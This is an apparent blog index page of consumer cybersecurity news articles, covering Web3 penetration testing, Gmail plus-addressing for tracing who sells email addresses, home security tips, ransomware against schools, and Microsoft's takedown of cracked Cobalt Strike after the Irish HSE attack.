Web3 Penetration Testing serves as the crucial shield against these challenges. It delves deeply into dApps and smart contracts, identifying vulnerabilities that could lead to unauthorized access or tampering. By proactively addressing these issues, organizations can prevent potential breaches and safeguard sensitive data.

The realm of Web3 technologies necessitates stringent security measures. Neglecting these challenges can result in financial losses, reputation damage, and compromised user trust. As the digital landscape becomes increasingly decentralized, the significance of robust Web3 Penetration Testing cannot be emphasized enough.

  • Mitigating Risks and Upholding Trust
Overlooking security within the Web3 landscape comes with significant risks. An insecure decentralized application (dApp) can expose user data, facilitate unauthorized transactions, and undermine the integrity of smart contracts. Such vulnerabilities can result in not only financial losses but also harm to an organization’s reputation.

This is where Web3 Penetration Testing comes in—a proactive defense against these risks. By identifying and rectifying vulnerabilities before they can be exploited, organizations can avoid financial setbacks and preserve their standing within the Web3 ecosystem.

The potential financial losses stemming from security breaches are compounded by the erosion of user trust. In the interconnected realm of Web3 technologies, the consequences of a breach can propagate swiftly, causing users to lose confidence in the technology and tarnishing an organization’s image.

  • Strengthening the Future of Decentralization

Web3 Penetration Testing emerges as a cornerstone in the secure evolution of the digital landscape. In the world of decentralized applications (dApps), smart contracts, and blockchain networks, its significance cannot be overstated.

This specialized security assessment zeroes in on the intricacies of Web3 technologies. It goes beyond traditional testing methodologies, unveiling vulnerabilities unique to decentralization. By simulating real-world attacks, Web3 Penetration Testing uncovers security gaps that could lead to unauthorized access, data breaches, and even financial losses.

Neglecting security within the Web3 landscape exposes organizations to multifaceted risks, financial setbacks, reputation damage, and erosion of user trust. With the promise of a decentralized future on the horizon, safeguarding the integrity of Web3 applications and networks becomes paramount.

Web3 Penetration Testing emerges as a potent ally in this endeavor, safeguarding against vulnerabilities that could compromise the very essence of decentralized systems.

By methodically probing decentralized applications, scrutinizing smart contracts, and dissecting blockchain networks, Web3 Penetration Testing reveals concealed vulnerabilities and offers solutions for rectification. Its role surpasses that of traditional security assessments, addressing the distinct challenges of the Web3 ecosystem.

As organizations delve deeper into the realm of decentralized technologies, the need to prioritize security becomes paramount. This article encourages readers to weave security into the fabric of their Web3 applications, advocating for regular assessments, proactive measures, and collaboration with Web3 Security Experts. By embracing these principles, organizations can confidently navigate the intricate Web3 landscape, fostering trust among users and bolstering the future of decentralized innovation.
Read more »
User Safety
Data Breach Data Leak Data Privacy Email Hack User Safety

How to Tell if a Company Is Selling Your Email Address

 

Have you ever signed up for a new website and then all of a sudden started getting emails from businesses and service providers you had never heard of? If so, there is a very good chance that your data has been sold. 

These days, selling your information to data brokers and other interested parties can bring in a lot of money for businesses because data is a valuable commodity. Although this unwanted spam is bothersome, don't worry. 

We'll demonstrate how to avoid spam and shady websites in this article. The following method also works with Outlook and iCloud if you don't use Gmail. 

How to identify the parties selling your data 

Your personal Gmail address includes numerous versions, which you might not be aware of yet. You can alter your address by simply prefixing "@gmail.com" with a "+" and a word or number. All email sent to this new variation will still arrive in your mailbox as usual. 

This technique makes it very simple to find out how and by whom your data has been shared. Almost too wonderful to be true? We'll explain that it's actually quite easy.

You must enter your email address when signing up for an online service, store, or other website. By employing this method, you can replace your original Gmail address with a "+" followed by the name of the service or website. 

For instance, you can log in using "dennis+firma1@gmail.com" rather than "dennis@gmail.com". You'll be able to pinpoint precisely who they may have given your data to while still receiving all emails from that provider or service to your regular mailbox. 

Therefore, if you join with "Firma1" and shortly after, receive spam emails from companies 2, 3, and 4 that you have never heard of or registered with, you can easily pinpoint the offender. You'll notice your email address under "To" if you open one of these scam emails in your inbox. 

In this case, if it reads "dennis+firma1@gmail.com," you may be certain that this provider has sold your data to company 2, which is currently spamming you. Just unsubscribe and remove these spam emails from your inbox to quickly fix this.

Companies exploiting loopholes

Yes, under very rare scenarios, businesses are allowed to sell specific data; email address trading is particularly common. Generally, by adopting a service's or website's privacy policy, you intentionally or unknowingly consent to the transfer of your data to third parties.

Due to the notice being buried in the statement and the fact that most people don't read it all the way through, this happens frequently to users. 

The aforementioned technique is thus especially suitable for determining which service—whether with or without your knowledge—discloses your address information to other parties.
Read more »
User Security
Cyber Security Data Data Safety data security Household Security threats User User Data User Safety User Security

Safeguard Your Home Against Rising Cyber Threats, Here's All You Need To Know

 

Malicious cyber actors have the ability to exploit vulnerable networks within households, potentially compromising personal and private information of family members, including children and elders.

In today's highly connected world, it is crucial to prioritize cybersecurity and take proactive steps to protect your household from cyber threats.

Educating your children and elders about the significance of safeguarding personal information, using strong passwords, and understanding cybersecurity best practices can significantly reduce the risk of falling victim to cyberattacks. 

As the threat landscape continues to evolve, safeguarding your household from malicious actors becomes paramount. To protect your family from cyber threats, consider implementing the following measures:

1. Manage your routing devices:
  • Keep your devices up-to-date with the latest firmware and software.
  • Secure your home network by using unique router usernames and strong passwords.
  • Create a separate guest network for visitors.
  • Change passwords regularly and schedule weekly router reboots.

2. Secure laptops, computers, and web devices:
  • Cover cameras when not in use to prevent unauthorized access.
  • Utilize non-admin accounts for everyday activities.
  • Regularly update operating systems and apply security patches.
  • Disconnect devices from the internet when not in use.
  • Enable multi-factor authentication or use passkeys where possible.
  • Schedule weekly reboots for added security.

3. Manage home assistants:
  • Be aware of which devices in your home have listening capabilities.
  • Avoid having sensitive conversations near home assistants.
  • Mute their microphones when not in use.
  • Review and understand the terms and conditions before accepting them blindly.

Additionally, it is crucial to protect senior relatives from cyberattacks, as they are often targeted for financial frauds due to their limited exposure to technology. 

Educate seniors about common scams and advise them to send unknown calls to voicemail, use credit freezes, and set strict privacy settings on social media. Legal tools such as living trusts, guardianships, or power of attorney can also be utilized to safeguard seniors from scammers.

When teaching children about cybersecurity, instill good cyber hygiene and privacy practices from an early age. Use cybersecurity games and resources suitable for their age group to impart knowledge effectively. 

Beyond passwords and privacy, educate children about verifying online information and identifying phishing and smishing attempts. Encourage them to be mindful of their privacy settings on social media platforms to prevent cyberbullying and protect their personal information.

By adopting these cybersecurity practices and fostering a cybersecurity-conscious environment, you can significantly enhance the safety and security of your family in the digital world.
Read more »
User Security
Cyber Attacks Cyber Safety Data Leak Data Privacy Ransom Research School Targets Schools Student Data User Data User Safety User Security

Schools: Prime Targets for Hackers Amid Poor Cybersecurity and Ransom Payments

 

New data indicates that school districts have become highly susceptible to online exploitation, emerging as the primary target for hackers. According to a recent global survey conducted by the British cybersecurity company 

Sophos, a staggering 80% of schools experienced ransomware attacks last year, representing a significant increase from the 56% reported in 2021. This doubling of the victimization rate over two years has led researchers to label ransomware as the most significant cyber risk faced by educational institutions today.

Comparing various industries, schools fared the worst in terms of victimization rates, surpassing even sectors like healthcare, technology, financial services, and manufacturing. 

The survey, which included responses from 400 education IT professionals worldwide, revealed that United States institutions are particularly attractive targets for hacking groups, especially since the events surrounding Russia's invasion of Ukraine.

Two factors have made schools especially vulnerable to cyber threats in the United States. First, the cybersecurity measures in educational settings often lag behind those in major businesses, such as banks and technology companies. Second, schools prove to be easy targets for exploitation due to their willingness to pay ransoms. 

Last year, nearly half of the attacks on schools resulted in ransom payments, further enticing threat actors. Unfortunately, this combination of weak defenses and a readiness to pay has made schools a "double whammy" for hackers, according to Chester Wisniewski, the field chief technology officer of applied research at Sophos.

The motivation to pay ransoms seems to be influenced by insurance coverage. In districts with standalone cyber insurance, 56% of victims paid the ransom, while those with broader insurance policies covering cybersecurity saw a payment rate of 43%. Insurance companies often cover ransom demands, giving them significant sway over which districts comply with the extortion demands.

Elder, a school representative, acknowledges the difficult decisions schools face when dealing with ransomware attacks. While it is essential to safeguard confidential information and protect people, the pressure to manage resources and finances can make the choice challenging.

Ultimately, the data suggests that schools must prioritize and strengthen their cybersecurity practices to avoid falling prey to hackers and ransom demands. 

Relying on insurance alone may not provide a comprehensive solution, as hackers continue to exploit vulnerabilities, and insurance companies struggle to keep pace with evolving threats.
Read more »
User Safety
Cyber Crime Data Leak Healthcare Hack Ireland Patient Info User Safety

Here's How Microsoft Fought Against Ireland's HSE Attackers

 

Hackers exploited the victim's infected computer to access Ireland's public health system and tunnel across the network for weeks after luring a worker with a phishing email and a spreadsheet that was laced with malware. Infecting thousands of more systems and servers, they prowled from hospital to hospital, explored folders, and opened personal files. 

By the time they demanded a ransom, they had already taken over more than 80% of the IT infrastructure, knocked out the organisation's 100,000+ employees, and put the lives of thousands of patients in danger.

The attackers employed a "cracked," or exploited and unauthorised, legacy version of a powerful tool to launch the 2021 attack on Ireland's Health Service Executive (HSE). The tool, which is used by credible security professionals to simulate cyberattacks in defence testing, has also become a favourite tool of criminals who steal and manipulate previous versions to launch ransomware attacks around the world. In the previous two years, hackers have attempted to infect over 1.5 million devices using cracked copies of the tool Cobalt Strike. 

However, Microsoft and the tool's owner, Fortra, now have a court order authorising them to seize and block infrastructure associated with cracked versions of the software. The order also permits Microsoft to interrupt infrastructure linked with the misuse of its software code, which thieves have utilised in some of the attacks to disable antivirus systems. Since the order was carried out in April, the number of compromised IP addresses has decreased dramatically. 

"The message we want to send in cases like these is: 'If you think you're going to get away with weaponizing our products, you're going to get a rude awakening,'" states Richard Boscovich, assistant general counsel for Microsoft's Digital Crimes Unit (DCU) and head of the unit's Malware Analysis & Disruption team. 

The effort to take down cracked Cobalt Strike began in 2021, when DCU — a diverse, multinational organisation of cybercrime fighters — aimed to make a deeper dent in the rising number of ransomware attacks. Previous operations had separately targeted particular botnets such as Trickbot and Necurs, but ransomware investigator Jason Lyons advocated a large operation targeting multiple malware groups and focusing on what they all had in common: the usage of cracked, old Cobalt Strike. 

"We kept seeing cracked Cobalt Strike as the tool in the middle being leveraged in ransomware attacks," Lyons explained, basing his evaluations on internal information about Windows-based attacks. 

Lyons, a former US Army counterintelligence special agent, had spent many nights and weekends responding to ransomware attacks and breaches. The opportunity to pursue multiple crooks at once allowed him to "bring a little pain to the bad guys and interrupt their nights and weekends, too," he adds.

But before it could start inflicting pain, Microsoft needed to clean up its own house and get rid of the broken Cobalt Strike in Azure. Rodel Finones, a reverse engineer who deconstructs and analyses malware, jumped to work right away. He had transferred from the Microsoft Defender Antivirus team to DCU a few years earlier in order to play a more proactive role in combating criminality. 

Finones designed a crawler that connected to every active, publicly accessible Cobalt Strike command-and-control server on Azure — and, ultimately, the internet. The servers communicate with infected devices, enabling operators to spy on networks, move laterally, and encrypt information. He also began looking into how ransomware criminals used Microsoft's technologies in their operations. 

Crawling, though, was insufficient. The investigators had a difficult time distinguishing between legitimate security uses of Cobalt Strike and unlawful use by threat actors. Fortra assigns a unique licence number, or watermark, to each Cobalt Strike kit sold, which serves as a forensic clue in cracked copies. However, the corporation was not involved in the first operation, and DCU investigators worked alone to create an internal catalogue of watermarks associated with customer attacks while cleaning up Azure. 

Meanwhile, Fortra, which purchased Cobalt Strike in 2020, was addressing the issue of criminals exploiting cracked copies. When Microsoft proposed a joint venture, the corporation needed time to ensure that working with Microsoft was the appropriate decision, according to Bob Erdman, assistant vice president for business development. 

In early 2023, Fortra joined the action and released a list of over 200 "illegitimate" watermarks linked to 3,500 unauthorised Cobalt Strike servers. The company had been doing its own investigations and implementing new security procedures, but teaming with Microsoft allowed access to scale, extra knowledge, and an additional method of protecting its tool and the internet. Fortra and Microsoft examined around 50,000 distinct copies of cracked Cobalt Strike during the inquiry. 

Microsoft benefited from the collaboration as well, with Fortra's knowledge and watermark list significantly expanding the operation's reach. It aided the firms' case, which linked malicious infrastructure to 16 unknown defendants, each representing a unique threat group. 

Lawyers argued that the groups – ransomware authors, extortionists, victim lurers, and cracked Cobalt Strike sellers — collaborated in a thriving, profitable ransomware-as-a-service operation aimed at maximising profit and harm. They also linked broken Cobalt Strike to eight ransomware families, including LockBit, a quick encryption and denial-of-service attacker, and Conti, the malware suspected in the disastrous 2022 attacks on the Costa Rican government.
Read more »
Subscribe to: Posts (Atom)